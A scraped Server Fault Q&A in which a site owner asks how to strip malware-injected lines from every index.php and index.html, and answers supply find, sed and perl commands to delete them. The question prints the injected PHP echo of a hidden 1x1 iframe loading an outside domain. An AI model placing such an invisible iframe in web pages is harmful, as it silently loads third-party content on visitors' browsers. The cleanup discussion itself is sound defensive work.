Search for index.php and index.html and replace stringRemove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters

Show that this function is bounded

Watts vs. Volt Amps

Are DSA and ECDSA provably secure assuming DL security?

looking for a book of short stories I read in the 80's cannot remember name

Which comes first? Multiple Imputation, Splitting into train/test, or Standardization/Normalization

At what point in time did Dumbledore ask Snape for this favor?

Why would future John risk sending back a T-800 to save his younger self?

What should the arbiter and what should have I done in this case?

Can anyone identify this tank?

An average heaven where everyone has sexless golden bodies and is bored

How does an ordinary object become radioactive?

How to Analytically Solve this PDE?

Compiling c files on ubuntu and using the executable on Windows

What is the `some` keyword in SwiftUI

Chemmacros scheme translation

How would a aircraft visually signal "in distress"?

Do any instruments not produce overtones?

Investing in a Roth IRA with a Personal Loan?

Using a found spellbook as a Sorcerer-Wizard multiclass

Arriving at the same result with the opposite hypotheses

How can I most clearly write a homebrew item that affects the ground below its radius after the initial explosion it creates?

Smooth switching between 12 V batteries, with a toggle switch

What's the name of this light airplane?

What can I, as a user, do about offensive reviews in App Store?



Search for index.php and index.html and replace string


Remove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty height:90px;width:728px;box-sizing:border-box;








0















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
























  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54

















0















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
























  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54













0












0








0


1






I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...







ftp replace






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited May 21 at 13:50









yagmoth555

12.7k31842




12.7k31842










asked Jul 18 '09 at 0:17









JonasJonas

32




32












  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54

















  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54
















You want to do what the malware is doing?

– random
Jul 18 '09 at 8:29





You want to do what the malware is doing?

– random
Jul 18 '09 at 8:29













No. I want to remove the line!

– Jonas
Jul 18 '09 at 15:54





No. I want to remove the line!

– Jonas
Jul 18 '09 at 15:54










5 Answers
5






active

oldest

votes


















2














one easy way to do this is by using find and grep, plus perl to do the edits.



first, construct a list of filenames that have been compromised:




find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


next, use perl to edit the files and remove the exploit:




cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






share|improve this answer























  • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

    – Jonas
    Jul 18 '09 at 16:10











  • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

    – cas
    Jul 18 '09 at 23:02











  • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

    – cas
    Jul 18 '09 at 23:03











  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

    – Jonas
    Jul 18 '09 at 23:22


















0














sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






share|improve this answer






























    0














    Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






    share|improve this answer






























      0














      Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



      find <documentroot> -name 'index.html' -or -name 'index.php' 
      -exec sed -i'.bak' '/fabujob.com/d' ;


      Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






      share|improve this answer
































        0














        If you know you have no <iframe> tags in your documents, you can simply do



        perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


        If you do have iframes, then you'll need to make your regex more exact.



        Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






        share|improve this answer























          Your Answer








          StackExchange.ready(function()
          var channelOptions =
          tags: "".split(" "),
          id: "2"
          ;
          initTagRenderer("".split(" "), "".split(" "), channelOptions);

          StackExchange.using("externalEditor", function()
          // Have to fire editor after snippets, if snippets enabled
          if (StackExchange.settings.snippets.snippetsEnabled)
          StackExchange.using("snippets", function()
          createEditor();
          );

          else
          createEditor();

          );

          function createEditor()
          StackExchange.prepareEditor(
          heartbeatType: 'answer',
          autoActivateHeartbeat: false,
          convertImagesToLinks: true,
          noModals: true,
          showLowRepImageUploadWarning: true,
          reputationToPostImages: 10,
          bindNavPrevention: true,
          postfix: "",
          imageUploader:
          brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
          contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
          allowUrls: true
          ,
          onDemand: true,
          discardSelector: ".discard-answer"
          ,immediatelyShowMarkdownHelp:true
          );



          );













          draft saved

          draft discarded


















          StackExchange.ready(
          function ()
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');

          );

          Post as a guest















          Required, but never shown

























          5 Answers
          5






          active

          oldest

          votes








          5 Answers
          5






          active

          oldest

          votes









          active

          oldest

          votes






          active

          oldest

          votes









          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22















          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22













          2












          2








          2







          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer













          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.







          share|improve this answer












          share|improve this answer



          share|improve this answer










          answered Jul 18 '09 at 1:40









          cascas

          5,6472229




          5,6472229












          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22

















          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22
















          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10





          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10













          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02





          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02













          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03





          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03













          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22





          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22













          0














          sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



          Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






          share|improve this answer



























            0














            sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



            Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






            share|improve this answer

























              0












              0








              0







              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






              share|improve this answer













              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.







              share|improve this answer












              share|improve this answer



              share|improve this answer










              answered Jul 18 '09 at 0:28









              SvenSven

              88.5k10150202




              88.5k10150202





















                  0














                  Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                  share|improve this answer



























                    0














                    Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                    share|improve this answer

























                      0












                      0








                      0







                      Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                      share|improve this answer













                      Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.







                      share|improve this answer












                      share|improve this answer



                      share|improve this answer










                      answered Jul 18 '09 at 3:31









                      Saurabh BarjatiyaSaurabh Barjatiya

                      4,06712431




                      4,06712431





















                          0














                          Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                          find <documentroot> -name 'index.html' -or -name 'index.php' 
                          -exec sed -i'.bak' '/fabujob.com/d' ;


                          Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                          share|improve this answer





























                            0














                            Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                            find <documentroot> -name 'index.html' -or -name 'index.php' 
                            -exec sed -i'.bak' '/fabujob.com/d' ;


                            Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                            share|improve this answer



























                              0












                              0








                              0







                              Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                              find <documentroot> -name 'index.html' -or -name 'index.php' 
                              -exec sed -i'.bak' '/fabujob.com/d' ;


                              Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                              share|improve this answer















                              Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                              find <documentroot> -name 'index.html' -or -name 'index.php' 
                              -exec sed -i'.bak' '/fabujob.com/d' ;


                              Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.







                              share|improve this answer














                              share|improve this answer



                              share|improve this answer








                              edited Jul 18 '09 at 10:31

























                              answered Jul 18 '09 at 9:44









                              Dan CarleyDan Carley

                              22.3k34668




                              22.3k34668





















                                  0














                                  If you know you have no <iframe> tags in your documents, you can simply do



                                  perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                  If you do have iframes, then you'll need to make your regex more exact.



                                  Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                  share|improve this answer



























                                    0














                                    If you know you have no <iframe> tags in your documents, you can simply do



                                    perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                    If you do have iframes, then you'll need to make your regex more exact.



                                    Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                    share|improve this answer

























                                      0












                                      0








                                      0







                                      If you know you have no <iframe> tags in your documents, you can simply do



                                      perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                      If you do have iframes, then you'll need to make your regex more exact.



                                      Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                      share|improve this answer













                                      If you know you have no <iframe> tags in your documents, you can simply do



                                      perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                      If you do have iframes, then you'll need to make your regex more exact.



                                      Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.







                                      share|improve this answer












                                      share|improve this answer



                                      share|improve this answer










                                      answered May 3 '10 at 18:46









                                      Andy LesterAndy Lester

                                      613415




                                      613415



























                                          draft saved

                                          draft discarded
















































                                          Thanks for contributing an answer to Server Fault!


                                          • Please be sure to answer the question. Provide details and share your research!

                                          But avoid


                                          • Asking for help, clarification, or responding to other answers.

                                          • Making statements based on opinion; back them up with references or personal experience.

                                          To learn more, see our tips on writing great answers.




                                          draft saved


                                          draft discarded














                                          StackExchange.ready(
                                          function ()
                                          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');

                                          );

                                          Post as a guest















                                          Required, but never shown





















































                                          Required, but never shown














                                          Required, but never shown












                                          Required, but never shown







                                          Required, but never shown

































                                          Required, but never shown














                                          Required, but never shown












                                          Required, but never shown







                                          Required, but never shown







                                          Popular posts from this blog

                                          Wikipedia:Vital articles Мазмуну Biography - Өмүр баян Philosophy and psychology - Философия жана психология Religion - Дин Social sciences - Коомдук илимдер Language and literature - Тил жана адабият Science - Илим Technology - Технология Arts and recreation - Искусство жана эс алуу History and geography - Тарых жана география Навигация менюсу

                                          Bruxelas-Capital Índice Historia | Composición | Situación lingüística | Clima | Cidades irmandadas | Notas | Véxase tamén | Menú de navegacióneO uso das linguas en Bruxelas e a situación do neerlandés"Rexión de Bruxelas Capital"o orixinalSitio da rexiónPáxina de Bruselas no sitio da Oficina de Promoción Turística de Valonia e BruxelasMapa Interactivo da Rexión de Bruxelas-CapitaleeWorldCat332144929079854441105155190212ID28008674080552-90000 0001 0666 3698n94104302ID540940339365017018237

                                          What should I write in an apology letter, since I have decided not to join a company after accepting an offer letterShould I keep looking after accepting a job offer?What should I do when I've been verbally told I would get an offer letter, but still haven't gotten one after 4 weeks?Do I accept an offer from a company that I am not likely to join?New job hasn't confirmed starting date and I want to give current employer as much notice as possibleHow should I address my manager in my resignation letter?HR delayed background verification, now jobless as resignedNo email communication after accepting a formal written offer. How should I phrase the call?What should I do if after receiving a verbal offer letter I am informed that my written job offer is put on hold due to some internal issues?Should I inform the current employer that I am about to resign within 1-2 weeks since I have signed the offer letter and waiting for visa?What company will do, if I send their offer letter to another company